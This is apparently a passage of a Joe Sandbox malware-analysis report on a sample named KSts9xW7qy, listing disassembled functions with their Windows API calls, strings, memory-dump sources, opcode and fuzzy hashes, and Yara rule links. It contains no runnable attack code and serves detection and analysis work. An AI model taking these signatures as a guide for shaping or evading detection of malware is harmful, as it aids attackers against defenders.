                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        • Opcode ID: f85b7d54392037d1378d7be0f670140aacc7e14acbfe9c6b2639f4ae5be944a9
                                                                        • Instruction ID: 9681eb5274b8e89fcaa1f1f589088e927d28464e05fe153edde04d48039b94c9
                                                                        • Opcode Fuzzy Hash: f85b7d54392037d1378d7be0f670140aacc7e14acbfe9c6b2639f4ae5be944a9
                                                                        • Instruction Fuzzy Hash: 96116A71100108AEEB105FA4DC44AEB3B6AEB053BCF506716F979A72E1C735DC52A7A0
                                                                        Function 00EB5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB52D5
                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EB52F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: 05b6faed3f814971f4dfc9830c4d3617dda3146b7b7696f771410229886f1590
                                                                        • Instruction ID: 6b7e900c84865c6cda8097b877bd3ddc51a255b9f3dd016f45973de9fc5b804f
                                                                        • Opcode Fuzzy Hash: 05b6faed3f814971f4dfc9830c4d3617dda3146b7b7696f771410229886f1590
                                                                        • Instruction Fuzzy Hash: 2F11D073901715ABDB20DB98D904BDE77F9AB05768F081025E901F72A4D3B0AD05C790
                                                                        Function 00EC4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EC4DF5
                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EC4E1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$OpenOption
                                                                        • String ID: <local>
                                                                        • API String ID: 942729171-4266983199
                                                                        • Opcode ID: 5017857d3267b88e50ebcb96a44afaa6eed5fd384d39bfdeb98ee337086bbe17
                                                                        • Instruction ID: dc090d9b34f3ffb7b21e003f298c61fada42c618533f248b9afdd919ba7fc204
                                                                        • Opcode Fuzzy Hash: 5017857d3267b88e50ebcb96a44afaa6eed5fd384d39bfdeb98ee337086bbe17
                                                                        • Instruction Fuzzy Hash: 1311C1B0100221BEDB259F518C94FFBFFA8FB06359F10811EF506A6080D2715842D6E0
                                                                        Function 00ECA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00ECA84E
                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00ECA88B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: htonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 3832099526-2422070025
                                                                        • Opcode ID: 9ab4f6658d4023f69e8ade41431cde13135f6ae11341fe18e22fc0be537b53ea
                                                                        • Instruction ID: 3d017aad9c094e8ad1312d1d31f2b7b9eee27c30c6644dc6f714ed2d5a9be391
                                                                        • Opcode Fuzzy Hash: 9ab4f6658d4023f69e8ade41431cde13135f6ae11341fe18e22fc0be537b53ea
                                                                        • Instruction Fuzzy Hash: 6B012676200308ABCB24AF64C84AFADB3A4EF45718F20946AF515BB2D1C736E806C752
                                                                        Function 00EAB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EAB7EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: 1954fc11929b2147216861495ffdd50859f141ff0e1896eee2e4df9d61cf3077
                                                                        • Instruction ID: 3cf833a1564123dfbcde0ded82c85abc84ea6b6ba489eff2763dbd8a73731aae
                                                                        • Opcode Fuzzy Hash: 1954fc11929b2147216861495ffdd50859f141ff0e1896eee2e4df9d61cf3077
                                                                        • Instruction Fuzzy Hash: 8B01D471A40114ABCB04EBA4CC529FE33AEFF4B350B14161DF466BB2D2EB7469089B91
                                                                        Function 00EAB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EAB6EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: b2d4dc0f5a92445cc68653da8534cdc490eba81946292cef468421ab28ddf561
                                                                        • Instruction ID: a4632d7e333e5b7ff033890f5c8dda82d3ac13ab0f590d9fddae01754a7fed96
                                                                        • Opcode Fuzzy Hash: b2d4dc0f5a92445cc68653da8534cdc490eba81946292cef468421ab28ddf561
                                                                        • Instruction Fuzzy Hash: 8001A271A41004ABCB04EBA4CD52BFE73EDDF4B344F20101DB406B7182EB54AE189BB6
                                                                        Function 00EAB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EAB76C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: edb6e4cbc8d9f0a5df2795fb0bf2313e61c04b3558082a1f5bc532f9bb430ee8
                                                                        • Instruction ID: 53aa6faea9bb0fe64848be34647236c41e10c61227e8ffe61b08e0d0a8f406d7
                                                                        • Opcode Fuzzy Hash: edb6e4cbc8d9f0a5df2795fb0bf2313e61c04b3558082a1f5bc532f9bb430ee8
                                                                        • Instruction Fuzzy Hash: 7C01DB75640104BBCB00E7A4DD12EFE73ED9B0B344F50511DB406B7192EB546E1997B6
                                                                        Function 00E74024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadImageW.USER32(00E70000,00000063,00000001,00000010,00000010,00000000), ref: 00E74048
                                                                        • EnumResourceNamesW.KERNEL32(00000000,0000000E,00EB67E9,00000063,00000000,75C10280,?,?,00E73EE1,?,?,000000FF), ref: 00EE41B3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: EnumImageLoadNamesResource
                                                                        • String ID: >
                                                                        • API String ID: 1578290342-260571596
                                                                        • Opcode ID: 3ea19f5a16df0045e2f17e227afedb45d4eb94c13401cf9eb32a0b3fb4f484c7
                                                                        • Instruction ID: 9eaa2949fc3dec0334efc9f1324720611b97637740ab9dd4b29b2160d4c3be78
                                                                        • Opcode Fuzzy Hash: 3ea19f5a16df0045e2f17e227afedb45d4eb94c13401cf9eb32a0b3fb4f484c7
                                                                        • Instruction Fuzzy Hash: 47F090B1644318BBE7205B1ABC4AFD23EAEF745BB5F104106F714BA1E0D3F09480EA90
                                                                        Function 00EB7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp
                                                                        • String ID: #32770
                                                                        • API String ID: 2292705959-463685578
                                                                        • Opcode ID: f8b7b059953977d4d64d4914ef05aad0c3fd7c6b8ead80cdf55316b37d4ca39b
                                                                        • Instruction ID: 80a6884923d2739c0824d6e073f4720be3b29d612919238ffaab8e4132eaa8af
                                                                        • Opcode Fuzzy Hash: f8b7b059953977d4d64d4914ef05aad0c3fd7c6b8ead80cdf55316b37d4ca39b
                                                                        • Instruction Fuzzy Hash: 24E092776042292BDB10EAA6AC09ED7FFACAB91764F010056B905E3041D674E60587D0
                                                                        Function 00EAA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EAA63F
                                                                          • Part of subcall function 00E913F1: _doexit.LIBCMT ref: 00E913FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: f2c4bda5c8ead7f61300ea77ebec05f4dee21421d3c7f25827ce74d3e47c7c5e
                                                                        • Instruction ID: b45aac15f5bfce97fc99173b05e2b691eb4f2dd656f84487eb0b9432f677252e
                                                                        • Opcode Fuzzy Hash: f2c4bda5c8ead7f61300ea77ebec05f4dee21421d3c7f25827ce74d3e47c7c5e
                                                                        • Instruction Fuzzy Hash: 95D02B323C432833D21437D83C07FC4358C8B49B51F040065FB0CB51C24AD2DA8062DA
                                                                        Function 00EEAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00EEACC0
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00EEAEBD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                        • String ID: WIN_XPe
                                                                        • API String ID: 510247158-3257408948
                                                                        • Opcode ID: 8a879ff2c89a10f639a42cb09253ec11c8e79c0db4c64d840466d6bfc2aa3a6e
                                                                        • Instruction ID: d6347c523cee66727208258c5f6e1c5cacde8e4de77bffa6eac23d6a47d7f107
                                                                        • Opcode Fuzzy Hash: 8a879ff2c89a10f639a42cb09253ec11c8e79c0db4c64d840466d6bfc2aa3a6e
                                                                        • Instruction Fuzzy Hash: 87E0E570C0454DDFDB11DBA6DD449ECF7B9AB88301F2890D9E116B2160D7705A45DF21
                                                                        Function 00ED86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ED86E2
                                                                        • PostMessageW.USER32(00000000), ref: 00ED86E9
                                                                          • Part of subcall function 00EB7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7AD0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: ecacb562815edc095deae9510109f0b0a29b4bf8ae80cdb91f0cdd9b358ee00f
                                                                        • Instruction ID: 06b4424859e4d3540fa24c815bb84429353a26e70a70966d1b91eff85f6be84d
                                                                        • Opcode Fuzzy Hash: ecacb562815edc095deae9510109f0b0a29b4bf8ae80cdb91f0cdd9b358ee00f
                                                                        • Instruction Fuzzy Hash: D2D0A931388324ABE3646330AC0BFC67E089B84B20F000804B24AFA0C0C8A0E900C614
                                                                        Function 00ED8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ED86A2
                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00ED86B5
                                                                          • Part of subcall function 00EB7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7AD0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: f16b1bcecff74a57d5b6b7b0325559c374722f7a7ddbe18523be922265f7765d
                                                                        • Instruction ID: 4d71df5af04f2ba892592795e08d6c7b46fac427a24fb03e83a946b5d10064dd
                                                                        • Opcode Fuzzy Hash: f16b1bcecff74a57d5b6b7b0325559c374722f7a7ddbe18523be922265f7765d
                                                                        • Instruction Fuzzy Hash: 2ED01271398324BBE3646771AC0BFD77E599B84B21F110815B74AFA1D0C9F4E944C754